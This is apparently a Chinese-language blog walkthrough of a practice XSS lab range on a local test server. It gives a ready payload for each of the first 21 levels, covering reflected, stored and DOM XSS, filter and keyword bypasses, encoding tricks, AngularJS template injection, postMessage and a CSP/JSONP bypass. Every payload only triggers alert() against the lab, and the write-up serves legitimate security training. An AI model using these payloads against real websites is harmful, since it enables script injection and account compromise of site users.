XSS-SEC靶场-前21关通过流程
准备工具:
- LingJing靶场平台
- 杨CC资源站 中的 [XSS-FUZZ字典]
- Trae cn(第十三关之后,会涉及到此工具)
LingJing-靶场选择:

杨CC资源站的XSS字典

开始搞事!
- 启动靶场

第一关
说明:
-
基础玩法
-
<script>alert('杨CC最帅')</script> -

点击SUBMIT
-

-
回显成功
-
2:
-

-

第二关(第二关以及以后,更换浏览器):
说明:
基于DOM的XSS
界面:

玩法:
URL后面跟上?keyword=test
复现:
代码:
<script>alert('杨CC最帅')</script><script>alert('杨CC最帅')</script>

第三关:
说明:
存储型的XSS
界面:

复现:
-
<script>alert('杨CC最帅')</script> -

第四关
说明:
使用不一样的标签进行突破限制
界面:
复现:
-
" autofocus onfocus=alert('杨CC最帅') " -
注意:这一行代码是自动触发弹窗,如果不想无限制触发,可以使用div或者其他标签,如:
-
<div data-value="USER_INPUT"></div> -

-
<div data-value="USER_INPUT"></div> -
使用此div注入后,则会显示:
-

-
按需即可
第五关
说明:
- 禁止
</script>标签
界面:

复现:
-
"<img/src=22 onerror=window.alert('杨CC最帅')> -

第六关:
说明:
打破单引号限制
界面:

复现:
' autofocus onfocus=alert(杨CC最帅) '
第七关(出现了点小插曲,重新启动靶场)
说明:
关键词删除
界面:

复现:
"><sscriptcript>alert("杨CC最帅")</sscriptcript>
第八关
说明:
编码绕过
界面:

复现:
javascript:alert('杨CC真市')
第九关:
说明:
URL 验证 - 必须包含 http://
界面:

复现:
-
http://192.168.242.69:3000/level9/index.php?keyword=" onmouseover=alert('杨CC最帅') " -

-
需要注意的是:此处返回弹窗可能会很慢.
第十关:
说明:
协议绕过-大小写
界面:

复现:
-
JAVASCRIPT:alert('杨CC真帅') -

第十一关:
说明:
JS上下文绕过
界面:

复现:
';alert('杨CC最帅了');//
第十二关
说明:
通过哈希方式进行DOM XSS
界面:

复现:
%3Cimg%20src%3Dx%20onerror%3Dalert%28%27%E6%9D%A8CC%E7%9C%9F%E5%B8%85%27%29%3E

第十三关(此关卡与后续关卡由Trae cn介入):
说明:
正则表达式
界面:

复现:
-
<img src=x onerror=alert('杨CC真帅')> -

-
其他复现方式:
-
<div onclick=alert('杨CC真帅')>点击我</div> -
<button onclick=alert('杨CC真帅')>点击我</button> -

第十四关:
说明:
双重编码
界面:

复现:
%22%29%3Balert%28%27%E6%9D%A8CC%E7%9C%9F%E5%B8%85%27%29%3B%2F%2F

第十五关:
说明:
框架注入,AngularJS模板注入
界面:

复现:
{{constructor.constructor('alert("杨CC真帅")')()}}
第十六关:
说明:
跟服务器沟通的xss
界面:

复现:
data:text/html,%3Cscript%3Eparent.postMessage('%3Cimg src=x onerror=alert(1)%3E','*')%3C/script%3E
- 会乱码,所以这次不弄杨CC真帅了
第十七关:
说明:
CSP绕过
界面:

复现:
data:text/html,<script src="http://192.168.242.69:3000/level17/index.php?callback=alert('杨CC真帅')"></script>(可以与16关一致)<script src="?callback=alert('杨CC真帅')"></script>
第十八关:
说明:
href 存储型xss
界面:

复现:
javascript:alert('杨CC真帅')
第十九关:
说明:
选择中的DOM XSS
界面:

复现:
</option></select><script>alert('杨CC真帅')</script>%3C%2Foption%3E%3C%2Fselect%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%27%E6%9D%A8CC%E7%9C%9F%E5%B8%85%27%29%3E</option></select><div onclick=alert('杨CC真帅')>点击我</div>
第二十关:
说明:
jQuery attr() 中的 DOM XSS。
界面:

复现:
javascript:(function(){alert('杨CC真帅');})()
- 需要点击[Back to Home],来触发弹窗
第二十一关(再次重启):
说明:
JS 字符串中的反射型跨站脚本(XSS)。
界面

复现:
'};alert('杨CC真帅');var a={'test':'test
第二十二关(再次重启)
说明:
反射型 DOM 型跨站脚本攻击
界面:


